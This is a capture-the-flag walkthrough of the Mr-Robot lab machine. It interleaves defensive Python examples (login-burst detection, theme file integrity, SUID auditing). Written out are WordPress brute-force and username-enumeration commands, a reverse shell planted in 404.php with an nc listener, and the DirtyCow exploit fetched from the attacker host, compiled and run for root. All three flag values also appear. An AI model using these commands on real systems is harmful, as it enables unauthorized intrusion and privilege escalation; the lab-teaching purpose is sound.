Last updated: 15 Apr 24 09:31:20 (UTC)

Write-Up MrRobot

Mr.Robot

By Lawcky & Taen 26/12/2023

Introduction

Mr.Robot is a well-known machine inspired by the series Mr.Robot.

Difficulty : Medium

Additional info:

Name: Mr-Robot: 1
Release date: 28 Jun 2016
Author: Leon Johnson
Series: Mr-Robot

|NOTE| The full scan outputs are not copied here as they would be far too voluminous; click here to see them.


In this write-up

  • curl & wget
  • uniq
  • wpscan
  • nmap
  • hydra
  • ffuf
  • hashcat
  • python
  • nc & reverse-shell code
  • DirtyCow’s exploit

Write-Up

Robots.txt

Content:

User-agent: *
fsocity.dic        (contains a wordlist)
key-1-of-3.txt

curl http://192.168.1.34/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
first flag found


fsocity.dic

Cleaning the wordlist (removing duplicate entries)

cat fsocity.dic | sort | uniq > filtered_list.dic
This reduces the wordlist from 850000 entries to around 12000 entries.
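As an added example (not part of the original write-up), the same deduplication done in Python: unlike `sort | uniq` it keeps the first-seen order of the entries, strips stray carriage returns and whitespace, drops blank lines and reports how many entries were read versus kept. The sample entries are constructed for the demo; the `dedupe_file` helper is assumed to be fed the path of a wordlist such as fsocity.dic.

```python
# Added example (not from the original write-up): order-preserving wordlist
# deduplication with a count of entries read vs. kept.
from typing import Iterable, List, Tuple


def dedupe_wordlist(lines: Iterable[str]) -> Tuple[List[str], int]:
    """Return (unique_entries, total_non_empty_entries).

    Trailing CR/LF and surrounding whitespace are stripped, empty lines are
    skipped, and the first occurrence of each word keeps its position."""
    seen = set()
    unique: List[str] = []
    total = 0
    for raw in lines:
        word = raw.rstrip("\r\n").strip()
        if not word:
            continue
        total += 1
        if word not in seen:
            seen.add(word)
            unique.append(word)
    return unique, total


def dedupe_file(src: str, dst: str) -> Tuple[int, int]:
    """Deduplicate the wordlist at `src` into `dst`; return (kept, read)."""
    with open(src, encoding="utf-8", errors="replace") as fh:
        unique, total = dedupe_wordlist(fh)
    with open(dst, "w", encoding="utf-8") as out:
        out.write("\n".join(unique) + "\n")
    return len(unique), total


# Constructed sample resembling a wordlist with heavy repetition.
SAMPLE = ["true\n", "false\n", "wikia\n", "true\n", "from\r\n",
          "the\n", "wikia\n", "\n", "  true\n"]

if __name__ == "__main__":
    uniq, total = dedupe_wordlist(SAMPLE)
    print(f"{total} entries read -> {len(uniq)} unique: {uniq}")
```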


Fuzzing the site using the filtered wordlist

ffuf -w filtered_list.dic:DIC -u http://192.168.1.34/DIC
[screenshot: ffuf output]
We can see several directories, one of them called Year… whose access is forbidden.


Wordpress

Dictionary attack on the target using the filtered wordlist and the user admin

sudo wpscan --url http://192.168.1.34/wp-login.php --password-attack wp-login -U admin -P filtered_list.dic
[screenshot: wpscan output]
admin is not a valid user.


Using hydra to fuzz for valid usernames (the login page answers "Invalid username." when the username does not exist, which is the failure string given to hydra)

sudo hydra -L filtered_list.dic -p password 192.168.1.34 -I -V http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username."
[screenshot: hydra output]


Dictionary attack on the target using the filtered wordlist and the valid users Elliot, elliot and ELLIOT

sudo wpscan --url http://192.168.1.34/wp-login.php --password-attack wp-login -U Elliot,elliot,ELLIOT -P filtered_list.dic
[screenshot: wpscan output with the valid password]
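The defender's side of the two runs above, as an added example that is not part of the original write-up: both the wpscan password attack and the hydra username enumeration produce a burst of POST requests to wp-login.php from a single address in a short time. The script below parses access-log lines in the Apache/nginx combined format and flags every source that sends at least a threshold of failed login POSTs inside a one-minute sliding window. The log lines, addresses, user agents and the threshold are constructed for the demo, as is the assumption that a failed WordPress login re-renders the form with status 200 while a successful one redirects with 302.

```python
# Added example (not from the original write-up): detect a wp-login.php
# brute-force / username-enumeration burst in web server access logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_login_bursts(lines: Iterable[str], threshold: int = 10,
                      window: timedelta = timedelta(minutes=1)) -> Dict[str, int]:
    """Return {ip: total_failed_posts} for every source that sent at least
    `threshold` failed POSTs to wp-login.php within any `window`-long span.
    Assumption (constructed for the demo): a failed WordPress login answers
    200 with the form re-rendered, a successful one redirects with 302."""
    failed: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue   # unparseable line: skip, do not crash the detector
        if (rec["method"] == "POST" and rec["path"].startswith("/wp-login.php")
                and rec["status"] != 302):
            failed[rec["ip"]].append(rec["ts"])
    flagged: Dict[str, int] = {}
    for ip, times in failed.items():
        times.sort()
        start = 0
        for end in range(len(times)):      # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


# Constructed log lines: 12 failed POSTs in 44 seconds from one address,
# a normal GET plus a successful login from another, and one unparseable line.
SAMPLE_LOG = [
    '192.168.1.253 - - [26/Dec/2023:10:00:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "WPScan v3.8"' % s
    for s in range(0, 48, 4)
] + [
    '192.168.1.10 - - [26/Dec/2023:10:00:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2105 "-" "Mozilla/5.0"',
    '192.168.1.10 - - [26/Dec/2023:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} failed wp-login.php POSTs inside the window")
```

The "Invalid username." string that hydra keys on is the same disclosure a defender wants to remove: WordPress can be configured to return one generic message for both unknown users and wrong passwords, and a rate limit or lockout on wp-login.php turns the burst the detector flags into a much slower attack.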


ReverseShell Time

[screenshot: reverse-shell code placed in the theme’s 404.php]
The reverse-shell code is put in the 404.php page of the theme in use.
Then, on our machine: nc -lnvp 1234
Finally, request the page to execute the remote code:
curl http://192.168.1.34/wp-content/themes/twentyfifteen/404.php
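From the defender's side, the edit above changes a file under wp-content/themes that should never change outside an update. As an added example (not part of the original write-up), the script below builds a SHA-256 manifest of a themes directory and reports files that were modified, added or removed since the baseline; the `demo` function builds a throw-away twentyfifteen directory in a temporary folder, edits its 404.php and drops a new file, all constructed for the demo, and shows the diff such a check produces.

```python
# Added example (not from the original write-up): file-integrity check for a
# WordPress themes directory, catching an edited 404.php or a dropped file.
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every file below `root` (relative path) to its SHA-256 digest."""
    manifest: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a stored baseline with a fresh manifest."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a theme, then simulate the 404.php edit."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "twentyfifteen")
        os.makedirs(theme)
        originals = {"404.php": "<?php get_header(); ?>\n", "index.php": "<?php // index ?>\n"}
        for name, body in originals.items():
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        baseline = build_manifest(root)          # taken right after deployment

        # Constructed changes standing in for the edit done in the write-up.
        with open(os.path.join(theme, "404.php"), "a") as fh:
            fh.write("<?php /* constructed marker for injected code */ ?>\n")
        with open(os.path.join(theme, "dropped.php"), "w") as fh:
            fh.write("<?php /* constructed dropped file */ ?>\n")
        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Running the check from cron against a baseline stored off-host (or generated from the pristine theme package) is what makes it useful; a baseline kept on the web server can be rewritten by whoever edited the theme. Disabling the theme/plugin file editor in wp-config.php removes the editing path used above altogether.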


Upgrading TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL-Z, then: stty raw -echo && fg
export TERM=xterm-256color
This gives a better shell in which CTRL-C works.
[screenshot: upgraded TTY]


User Robot

ls /home/robot
[screenshot: contents of /home/robot]
We find the robot user’s password in MD5 format, and the second key, which can only be read by the robot user.


Hashcat

sudo hashcat -m 0 MrRobot.md5 rockyou.txt
[screenshot: hashcat result]
The password is all the letters from A to Z.


MrRobot

su robot
[screenshot: su robot]
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
second flag found


Privilege escalation

The robot user doesn’t have access to sudo.

linpeas.sh

On our machine:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python3 -m http.server 8080
(opens an HTTP server to send the file to the target)

On our target:
wget http://192.168.1.253:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
The enumeration reveals possible kernel exploits and SUID binaries.


DirtyCow’s path

exploit: https://www.exploit-db.com/exploits/40839

Since the target doesn’t have DNS access, we use the same technique as before to transfer the files, with the python3 http.server module.

On our machine:
wget https://github.com/exrienz/DirtyCow/raw/master/dc64.c
python3 -m http.server 8080

On our target:
wget http://192.168.1.253:8080/dc64.c
gcc dc64.c -o cowroot -pthread
./cowroot
[screenshot: cowroot output]
The exploit worked.
[screenshot: root shell and third key]
04787ddef27c3dee1ee161b21670b4e4
third flag found


Bonus: SUID exploits

Intended way for this machine

find / -perm -4000 2>/dev/null
Searching for binaries with SUID permissions.
[screenshot: find output]
We can see nmap, which is a vulnerable binary when SUID ==> https://gtfobins.github.io/

And now we exploit it:
[screenshot: nmap SUID exploitation]
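The find command above is also the core of a periodic audit: the question a defender asks is not "which files are SUID" but "which SUID files are not on the expected list". As an added example (not part of the original write-up), the script below walks a tree with os.lstat, collects regular files that carry the setuid bit and reports the ones missing from a baseline. The `demo` function builds a throw-away tree in a temporary directory with a constructed baseline (ping, passwd) and a constructed out-of-place setuid copy of nmap, so it runs without touching the real filesystem; `find_suid("/")` is how it would be pointed at a host.

```python
# Added example (not from the original write-up): audit setuid files against
# an expected baseline, so an unexpected SUID nmap stands out.
import os
import stat
import tempfile
from typing import Iterable, List


def find_suid(root: str) -> List[str]:
    """Return sorted paths (relative to root) of regular files with the setuid bit."""
    hits: List[str] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry: skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


# Baseline of setuid files expected on this host; constructed for the demo.
EXPECTED_SUID = {"bin/ping", "usr/bin/passwd", "usr/bin/sudo"}


def unexpected_suid(root: str, expected: Iterable[str] = EXPECTED_SUID) -> List[str]:
    """Setuid files present under root that the baseline does not account for."""
    expected = set(expected)
    return [p for p in find_suid(root) if p not in expected]


def demo() -> List[str]:
    """Constructed tree: two baseline SUID files, one SUID nmap, one normal file."""
    layout = [("bin/ping", True), ("usr/bin/passwd", True),
              ("usr/local/bin/nmap", True), ("usr/bin/ls", False)]
    with tempfile.TemporaryDirectory() as root:
        for rel, suid in layout:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\n")      # placeholder content, not a real binary
            os.chmod(full, 0o755 | (stat.S_ISUID if suid else 0))
        return unexpected_suid(root)


if __name__ == "__main__":
    print("unexpected setuid files:", demo())
```

On a real host the baseline comes from the package manager's file lists or from a clean image, and any new entry (nmap here) is a change to investigate before it becomes a privilege-escalation path; mounting user-writable filesystems with nosuid keeps the bit from mattering there at all.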


Flags

flag 1/3

073403c8a58a1f80d943455fb30724b9

found in the robots.txt


flag 2/3

822c73956184f694993bede3eb39f959

found in the user robot’s desktop


flag 3/3

04787ddef27c3dee1ee161b21670b4e4

found in root directory